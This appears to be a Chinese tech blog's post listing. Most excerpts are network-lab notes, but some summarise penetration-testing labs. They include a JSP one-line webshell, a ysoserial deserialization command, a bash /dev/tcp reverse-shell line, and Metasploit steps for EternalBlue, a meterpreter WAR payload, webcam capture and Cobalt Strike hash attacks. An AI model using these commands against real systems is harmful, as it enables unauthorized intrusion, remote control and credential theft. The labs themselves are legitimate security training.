自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(63)
  • 收藏
  • 关注

原创 在kali中搭建docker容器

6.设置docker开机自启(可选)7.查看docker 容器状态。8.查看docker容器版本。4.下载docker容器。5.启动docker容器。3.升级已安装的软件包。

2025-04-07 14:04:48 502

原创 windows11 官方下载安装配置JAVA JDK 11版本

一 下载jdk11(根据电脑版本下载对应的安装包或者压缩包 若跳出Oracle账号登录页面,可选择注册登录)变量值:jdk安装的位置,要选择有版本目录的(根据直接安装目录选择)4.在命令中输入java -version 可查看到安装的jdk版本。1.双击下载好的文件,进入安装程序页面选择下一步。3.在系统变量中找到Path 点击编辑 点击新建。5.以上3个命令都没有问题,恭喜你安装成功。3.在命令中输入javac出现以下回显。2.在命令中输入java出现以下回显。3.安装成功之后点击关闭即可。

2025-04-02 14:22:32 3311

原创 win11环境下docker启动失败之Docker Desktop distro installation failed解决方案

2.电脑搜索启用或关闭Windows功能确保以下两块内容勾选。3.管理员身份运行powershell。4.输入以下命令重启重启 电脑。5.重启后运行docker。

2025-03-23 20:06:10 1917 1

原创 漏洞复现之Tomcat-CVE-2017-12615

漏洞的根本原因在于/usr/local/tomcat/conf/web.xml中的readonly属性设置为了false,如果desktop的UI可用,则直接编辑修改web.xml是最简单。中,get给1.jsp(一句话木马)的pwd参数如果其值为"123",则把从浏览器传递的 i参数(字符串)作为命令进行执行,执行结果赋值给变量in。这也就是说,从浏览器i参数传的字符串,变成了tomcat上执行的命令,命令结果回显到浏览器上。使用浏览器验证:http://192.168.32.1:8080/1.jsp。

2025-03-23 19:37:02 943

原创 漏洞复现之PHP-CVE-2012-1823

usr/local/bin/php-cgi -d include_path=/path`的方式传入php-cgi,更可以通过querystring的方式传入。/usr/local/bin/php-cgi -d include_path=/path`的写法来进行测试,认为不应该限制php-cgi接受命令行参数,而且这个功能不和其他代码有任何冲突。- `-c` 指定php.ini文件的位置。- `-h`和`-?

2025-03-19 10:23:12 645

原创 JBoss-CVE-2017-7504 漏洞验证

该漏洞存在于JBoss AS 7.x版本中,特别是在处理Java反序列化对象的过程中存在缺陷。命令:java -jar c:/soft/java/ysoserial-all.jar CommonsCollections7 "touch /tmp/success" > 1.ser。如上图,正常执行完成后,在当前执行命令的路径下(图中为c:\java),生成了1.ser文件(大小一般为几kB)。如前命令,在靶机的/tmp/下创建了文件success,虽然仅是个空文件,但相对于实现了远程命令执行。

2025-03-19 10:16:38 579

原创 JBoss-CVE-2017-12149反序列化漏洞验证

在 Linux 系统中,/dev/tcp 是一个特殊的设备文件,用于建立 TCP 连接。在这个命令中,bash -i >& /dev/tcp/目标主机 IP/目标 主机端口号 0>&1 的含义是:启动一个交互式的 bash 终端,并将标准输出和标准输 入都重定向到通过 TCP 协议连接到 IP 地址为目标主机 IP、端口号为目标主机端口号的 主机,从而实现远程控制。当服务器接收到包含恶意序列化数据的请求时,由于缺乏适当的安全检查,这些数据会被反序列化为Java对象,从而触发远程命令执行。

2025-03-19 10:08:12 316

原创 使用nc实现两台主机之间的正向和反向连接。

ka。

2025-03-19 10:01:38 380

原创 weblogic-weak-password漏洞验证

这两个文件均位于base_domain下,名为`SerializedSystemIni.dat`和`config.xml`,在本环境中为`./security/SerializedSystemIni.dat`和`./config/config.xml`(基于当前目录`/root/Oracle/Middleware/user_projects/domains/base_domain`)。值得注意的是,你可以将你的webshell放到本项目的`web/hello.war`这个压缩包中,再上传。

2025-03-19 09:51:45 390

原创 weblogic-CVE-2017-12149漏洞验证

(1)验证漏洞:weblogic-CVE-2017-12149漏洞验证使用nc、burp等工具,构建序列化利用请求,获得反弹shell,实现漏洞利用。1.环境搭建拉取镜像:dockers load -I 地址2.测试准备Win11:3.漏洞验证。

2025-03-19 09:45:39 501

原创 Tomcat8弱口令-getshell渗透实例

(1)使用 kali 生成 1.war 包 打 开 MetaSploit Framework, 使 用“use payload/java/meterpreter/reverse_tcp”来到 恶意 war 生成模块,并随后配置好回连地址及端口,接着使用“generate -f war -o /home/kali/1.war”命令在/home/kali/生成名为 1028.war 的包。那么, 我们在进行字典爆破时,也必须把账号和密码信息使用英文冒号连接,经 base64 编码 后进行攻击。

2025-03-19 09:39:45 994

原创 MetaSploit渗透测试1-ms17_010

扫描子网nmap -nsP 192.6.130.0/24指定主机扫描nmap -O -Pn/-p0 192.168.6.132选择漏洞利用模块启动msf root@kali:~# msfconsole 进入msf6框架 msf5 > search ms17_010选择漏洞利用模块其中的【exploit/windows/smb/ms17_010_eternalblue】就是我们本次需要的漏洞利用攻击模块use exploit/windows/smb/ms17_010_eternalblueshow optio

2025-03-19 09:34:11 269

原创 MetaSploit渗透测试2-Metasploitable2-linux

172.17.152.196 登录:msfadmin/msfadmin proot:sudo su root 密码:msfadmin。特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“:)“为结尾,服务器就会在6200端口监听,并且能够执行任意代码。Metasploitable2 它是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常 见漏洞攻击。(3)在Windows使用ssh工具实现对靶机的ssh连接。使用exploit进行攻击攻击成功获取到靶机的权限。

2025-03-19 09:27:01 1185

原创 MSF/Meterpreter/weevely/phpwebshell的应用

5.使用weevely和meterpreter配合应用,并预先在Windows7靶机上搭建php web服务,实现weevelyshell的后渗透持久化利用。4.使用meterpreter,访问靶机的摄像头等硬件设备,实现拍照等访问。3.使用migrate命令,实现meterpreter进程寄宿。Win7:set RhOST IPv4地址。

2025-03-19 09:01:55 428

原创 Cobalt-Strike_4.9.1的应用

这些是注入到目标系统中的后门,能够执行命令、收集信息等。Beacons可以通过不同的方式进行隐蔽通信(如HTTP/HTTPS、DNS等)。(Team Server):这是服务器端组件,负责管理会话、处理命令、以及与客户端进行通信。:这个组件是渗透测试人员用于与Team Server交互的界面,通常为Java应用程序,允许用户执行各种渗透测试操作。3.使用Cobalt-Strike,实现对Windows用户的账号和密码(hash)的攻击利用。2.完成Cobalt-Strike的安装和连接。

2025-03-19 08:48:10 634

原创 PowerSploit的安装配置

接着输入以下命令开启 Apache 服务,如图 6-6 所示。开启 apache 服务:service apach2 start 或:/etc/init.d/apache2 start。把下载好的文件夹移动到 var/www/html 目录,搭建一个简易的服务器,在网页中打开 /http://192.168.6.129/powersploit/:在kali中使用 Git 来克隆 PowerSploit。

2025-03-19 08:36:11 287

原创 oneforall工具的使用

环境准备在Kali Linux上安装特定版本的Python(如3.11.8)

2025-03-19 08:32:26 519

原创 安装window server 2008 R 2教程

下载镜像window server 2008 R 2第一步,点击新建虚拟机 选择自定义 点击下一步默认下一步勾选安装操作系统,点击下一步客户操作系统选择MicosoftWindows,版本选择Windows server 2008 R2 x64位置可以修改到D盘,点击下一步默认,选择BIOS,下一步默认,下一步网络类型选择桥接模式,点击下一步默认下一步默认下一步点击自定义硬件点击新CD/DVD(SATA),使用ISO映像文件,浏览选择Windows server 2008 R2iso镜像文件,关闭点击开启此

2025-03-19 08:13:30 2338 1

原创 漏洞复现之CVE-2012-1823

usr/local/bin/php-cgi -d include_path=/path`的方式传入php-cgi,更可以通过querystring的方式传入。/usr/local/bin/php-cgi -d include_path=/path`的写法来进行测试,认为不应该限制php-cgi接受命令行参数,而且这个功能不和其他代码有任何冲突。- `-c` 指定php.ini文件的位置。- `-h`和`-?

2025-03-19 07:54:23 662

原创 渗透测试之Tomcat-CVE漏洞实验

漏洞的根本原因在于/usr/local/tomcat/conf/web.xml中的readonly属性设置为了false,如果desktop的UI可用,则直接编辑修改web.xml是最简单。中,get给1.jsp(一句话木马)的pwd参数如果其值为"123",则把从浏览器传递的 i参数(字符串)作为命令进行执行,执行结果赋值给变量in。这也就是说,从浏览器i参数传的字符串,变成了tomcat上执行的命令,命令结果回显到浏览器上。使用浏览器验证:http://192.168.32.1:8080/1.jsp。

2025-03-18 22:26:13 763

原创 解决 Burp Suite 鼠标偏移

1.在java的安装目录下找到bin目录,找到javaw.exe,右键属性。2.选择兼容性,更改高DPI设置,改为系统(增强)3.点击确定重启Burp Suite 即可。

2025-03-18 16:13:43 248

原创 实验22.网络安全产品及管理之综合练习

2.在AR1上配置DHCP,VLAN10,VLAN20,VLAN30,VLAN40,VLAN50这5个VLAN所需的地址范围根据前面的规划确定,使得在VLAN10,VLAN20,VLAN30,VLAN40,VLAN50这5个VLAN中PC1,PC2,PC3,PC4,PC7获得相应的IP地址。(2)在PC1,PC2,PC3,PC4,PC7上使用ipconfig命令显示获得的IP地址情况。(3)测试PC1,PC2,PC3,PC4,PC7,Server1可以互通。(3)各设备的IP地址设置(5分)

2025-03-18 13:53:38 586

原创 实验21.网络安全产品及管理之ACL配置前缀列表

根据路由器转发数据的原理,在转发数据包时路由器会根据最长匹配的原则去匹配路由条目,即R4向分部A的终端PC-1发送数据时,当数据包到达R1后,根据爆头的目的IP地址与路由表中的路由条目进行匹配,发现11.1.1.0/25条目匹配更精确,这会使得数据包都根据这条路由条目进行转发,即将原本要发往PC-1的数据包都错误地发往R3,造成总部与分部A异常通信。这是因为ACL无法实现对掩码长度进行精确匹配,而分部A的网络位和分部B的网络位相同,都是11.1.1.0,就会导致把分部A的路由也同时过滤。

2025-03-18 11:45:10 625

原创 实验20.网络安全产品及管理之ACL配置高级的访问控制列表

基本是ACL只能用于匹配源IP地址,而在实际应用当中往往需要针对数据包的其他参数进行匹配,比如目的IP地址、协议号、端口号等,所以基本的ACL由于匹配的局限性而无法实现更多的功能,所以就需要使用高级的访问控制列表。如果要R1只能通过访问R4的环回接口0地址登录设备,即同时匹配数据包的源地址和目的地址实现过滤,此时通过标准ACL是无法实现的,因为ACL只能通过匹配源地址实现过滤,所以需要使用高级ACL。都可以成功正常登录。可以观察到,在不指定规则ID的情况下,默认步长为5,第一条规则的规则ID即为5。

2025-03-18 11:41:16 891

原创 实验19.网络安全产品及管理之ACL配置基本的访问控制列表

并且在配置的时候也可以不采用手工方式指定规则ID,ACL会自动分配规则ID,第一条为5,第二条为10,第三条为15,以此类推,即默认步长为5,该步长参数也是可以修改的。Rule-ID可以由用户进行配置,也可以由系统自动根据步长生成,默认步长为5,Rule-ID默认按照配置先后顺序分配0、5、10、15等,匹配顺序按照ACL的Rule_ID的顺序,从小到大进行匹配。接下来在ACL视图中,使用rule命令配置ACL规则,指定规则ID为5,允许数据包源地址为1.1.1.1的报文通过,反掩码为全0,即精确匹配。

2025-03-18 11:37:45 674

原创 实验18.网络安全产品及管理之配置DHCP中继

DHCP中继可以使客户端通过它与其它网段的DHCP服务器通信,最终获取IP地址,解决了DHCP客户端不能跨网段向服务器动态获取IP地址的问题。下面配置R1为DHCP中继设备,指定DHCP服务器为R3.这是如果R1从E1/0/1接口接收到PC的DHCP广播请求包,R1作为DHCP中继设备会以单播形式转发请求包到中继所指明的DHCP服务器R3;R1再把地址信息发送给PC。当DHCP中继设备R1和DHCP服务器R3配置完成后,且中间链路的连通性也正常的情况下,配置PC机使用DHCP获取IP地址。

2025-03-18 11:29:32 511

原创 实验17.网络安全产品及管理之配置基于全局地址池的DHCP

基于接口地址池的DHCP服务器,连接这个接口网段的用户都从该接口地址池中获取IP地址等配置信息,由于地址池绑定在特定的接口上,可以限制用户的使用条件,因此在保障了安全性的同时也存在一定局限性。默认情况下,IP地址租期为1天,对于不同的地址池,DHCP服务器可以指定不同的地址租用期限,但是同一地址池中的地址具有相同的租期。以上信息显示有两个地址池,其中一个地址池为huawei1,另一个地址池为huawei2,地址池的地址总数为506,使用了0个,空闲502个,有4个地址不参与分配。开启接口的DHCP功能。

2025-03-18 11:24:06 723

原创 实验16.网络安全产品及管理之配置基于接口地址池的DHCP

有些地址需要分配给其他服务,如DNS服务器或HTTP服务器等需要手工静态配置的IP地址,就不能再动态分配客户端使用,可以执行该命令配置地址池中不参与自动分配的IP地址(默认该地址池所有地址参与自动分配,次命令作为可选命令)。在R1的G0/0/0接口上使用dhcp server lease命令配置DHCP服务器地址池中IP地址的租用有效期限为2天,G0/0/1接口不修改,使用默认值1天,超过租期后该地址将会重新分配。接口地址池可动态分配IP地址,范围就是接口的IP地址所在网段,且只在此接口下有效。

2025-03-18 11:21:38 881

原创 实验15.网络安全产品及管理之利用三层交换机实现VLAN间路由

在现实网络中,经常会遇到需要跨VLAN相互访问的情况,工程师通常会选择一些方法来实现不同VLAN间主机的相互访问,例如单臂路由。三层交换机在原有二层交换机的基础上增加了路由功能,同时由于数据没有像单臂路由那样经过物理线路进行路由,很好地解决了带宽瓶颈的问题,为网络设计提供了一个灵活的解决方案。VLAN内的主机间可以直接通信,而VLAN间不能直接互通。VLANIF接口是基于网络层的接口,可以配置IP地址。根据实验编址表进行相应的基本IP地址配置。测试PC机间的互通性。测试PC机与网关之间的连通性。

2025-03-18 11:17:26 195

原创 实验14.网络安全产品及管理之VLAN间路由与DHCP

单臂路由的原理是通过一台路由器,使VLAN间互通数据通过路由器进行三层转发。如果在路由器上为每个VLAN分配一个单独的路由器物理接口,随着VLAN数量的增加,必然需要更多的接口,而路由器能提供的接口数量比较有限,所以在路由器的一个物理接口上通过配置子接口(即逻辑接口)的方式来实现以一当多的功能,将是一种非常好的方式。路由同一物理接口的不同子接口作为不同VLAN的默认网关,当不同VLAN间的用户主机需要通信时,只需将数据包发送给网关,网关处理后再发送至目的主机所在VLAN,从而实现VLAN间通信。

2025-03-18 11:14:27 364

原创 实验13.网络安全产品及管理之路由引入与路由策略

AR4和LSW1及AR5和LSW2连接着服务器集群,这些服务器分为两类,一类是生产服务器,使用的IP网段是10.0.1.0/24,另一类则是办公服务器,使用的IP网段是10.0.2.0/24。AR4及AR5并不运行OSPF,使用默认路由,因此为了使AR1及AR2收到PC发往服务器集群的数据包时能够将其转发到目的地,就需要在AR1及AR2上部署到达10.0.1.0/24及10.0.2.0/ 24的静态路由。(1)在PC1上测试与10.0.1.10与10.0.2.10的互通性;(1)AR4上配置默认路由。

2025-03-18 11:06:44 692

原创 实验12.网络安全产品及管理之BGP

BGP路由表最左列显示了该条路由的状态,“*>”中的星号表示该条BGP路由是可用的,“>”表示该条路由被优选,或者说是最优路由(Best),当BGP发现了多条到达相同目的网段的路由时,它会将所有路由都陈列在BGP路由表中,并从中选择一条最优的路由,只有最优的路由才会被放入设备的全局路由表,也只有最优的路由才会被通告给其他BGP对等体。原因是该路由的Next_Hop不可达。“Ogn”显示的是Origin属性值,如果此处显示:“i”,则表示该路由是被BGP的network命令发布的,也就是Orign为IGP;

2025-03-18 09:55:22 926

原创 实验11.网络安全产品及管理之 IS-IS基础配置

考虑到公司未来的发展(部门的增加和分公司的成立),为了适应不断扩展的网络的需求,公司在所有路由器上部署OSPF协议,且现在所有路由器都属于骨干区域。在OSPF单区域中,每台路由器都需要收集其他所有路由器的链路状态信息,如果网络规模不断扩大,链路状态信息也会随之不断增多,这将使得单台路由器上链路状态数据库非常庞大,导致路由器负担加重,也不便于维护管理,为了解决上述问题,OSPF协议可以将整个自治系统划分为不同的区域(Area),就像一个国家的国土面积很大时,会把整个国家划分为不同的省份来管理一样。

2025-03-18 08:26:31 633

原创 实验10.网络安全产品及管理之OSPF

考虑到公司未来的发展(部门的增加和分公司的成立),为了适应不断扩展的网络的需求,公司在所有路由器上部署OSPF协议,且现在所有路由器都属于骨干区域。在OSPF单区域中,每台路由器都需要收集其他所有路由器的链路状态信息,如果网络规模不断扩大,链路状态信息也会随之不断增多,这将使得单台路由器上链路状态数据库非常庞大,导致路由器负担加重,也不便于维护管理,为了解决上述问题,OSPF协议可以将整个自治系统划分为不同的区域(Area),就像一个国家的国土面积很大时,会把整个国家划分为不同的省份来管理一样。

2025-03-18 08:03:10 1041

原创 实验9.网络安全产品及管理之RIP

在R3的S 1/0/1接口上抓包,可以观察到,RIPv1的协议报文中没有携带掩码信息,只有相应的网络号以及Metric值,即RIPv1只发布汇总后的有类路由。RIPv1是有类别路由协议,它的协议报文中没有携带掩码信息,只能识别A、B、C类这样的自然网段的路由,因此RIPv1无法支持路由聚合,也不支持不连续子网,所有路由会被自动汇总为有类路由。RIPv2支持自动汇总,默认是开启的,并且可以关闭。可以观察到,接收到的路由条目是具体的明细路由条目,而没有汇总路由,即此时RIPv2默认自动汇总并没有生效。

2025-03-17 21:07:33 715

原创 实验8.网络安全产品及管理之静态路由

负载均衡,当数据有多条可选路径前往同一目的网络,可以通过配置相同优先级和开销的静态路由实现负载均衡,使得数据的传输均衡地分配到多条路径上,从而实现数据分流、减轻单条路径负载过重的效果。浮动静态路由是一种特殊的静态路由,通过配置去往相同的目的网段,但优先级不同的静态路由,以保证在网络中优先级较高的路由,即主路由失效的情况下,提供备份路由。如果PC-1可以连通网关,而PC-2不能连通其网关,PC-1与PC-2不同,而PC-1也无法登录到R3进行管理。可以发现两条路由的不同的优先级,优先级高的在路由表中。

2025-03-17 20:53:30 740

原创 实验7.网络安全产品及管理之VLAN聚合

2)Sub-VLAN:必须被关联到对应的Super-VLAN,也就是被Super-VLAN聚合,因此Sub-VLAN类似“子VLAN”的概念。同一个Super-VLAN内的Sub-VLAN之间彼此依然二层隔离,但是这些Sub-VLAN共用Super-VLAN的VLANIF,也就是说,所有Sub-VLAN内的主机使用相同的IP网段,并且这些主机都可以将缺省网关设置为Super-VLAN的VLANIF。由于PC-4位于VLAN 30中PC-1位于VLAN 10因此PC-1无法直接与PC-4通信。

2025-03-17 20:39:03 746

原创 实验6.网络安全产品及管理之MUX VLAN技术

从VLAN (Subordinate VLAN):分为两种,一种是互通型Subordinate VLAN (Group VLAN),另一种是隔离型Subordinate VLAN (Separate VLAN)。加入Group VLAN的接口也即Group Port, Group Port可以和Principal Port通信,属于同一个Group VLAN的用户之间能够进行二层通信,而属于不同Group VLAN的用户之间就无法通信了,另外Group Port也无法与Separate Port通信。

2025-03-17 20:28:51 524

原创 实验5.网络安全产品及管理之配置Hybrid接口

在没有定义VLAN及接口类型之前,默认情况下,交换机上所有接口都是Hybrid类型,接口的PVID是VLAN 1,即所有接口收到没有标签的二层数据帧,都被转发到VLAN 1中,并继续以Untagged的方式把帧发送至同为VLAN 1的其他接口。如果是Untagged,先剥离帧的VLAN标签,再发送;通过配置Hybrid接口,能够实现对VLAN标签的灵活控制,既能够实现Access接口的功能,又能够实现Trunk接口的功能。可以看出,接口默认是Hybrid类型,接口PVID是VLAN 1,其他接口也一样。

2025-03-17 20:24:11 444

原创 实验4.网络安全产品及管理之配置Trunk接口

当Trunk端口发送数据帧时,当该所发送帧的VLAN ID与端口的PVID不同时,检查是否允许该VLAN通过,若允许的话直接透传,不允许就直接丢弃;当Trunk端口收到数据帧时,如果该帧不包括802.1Q的VLAN标签,将打上该Trunk端口的PVID;根据实验编址表进行相应的基本IP地址配置,在此步骤中不要为交换机创建任何的VLAN,并使用ping命令检测各直连链路的连通性。Trunk端口一般用于交换机之间连接的端口,它可以属于多个VLAN,可以接收和发送多个VLAN的报文。所有的PC都能互相通信。

2025-03-17 20:18:35 421

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除